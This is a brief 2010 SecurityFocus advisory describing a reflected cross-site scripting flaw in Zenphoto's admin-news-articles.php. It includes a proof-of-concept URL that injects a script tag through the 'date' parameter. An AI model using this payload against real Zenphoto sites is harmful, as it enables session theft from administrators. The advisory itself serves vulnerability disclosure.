Zenphoto 'admin-news-articles.php' Cross Site Scripting Vulnerability

An attacker can exploit the issue by enticing an unsuspecting user to visit a specially crafted URL.

The following example URI is available:

http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>


 

Privacy Statement
Copyright 2010, SecurityFocus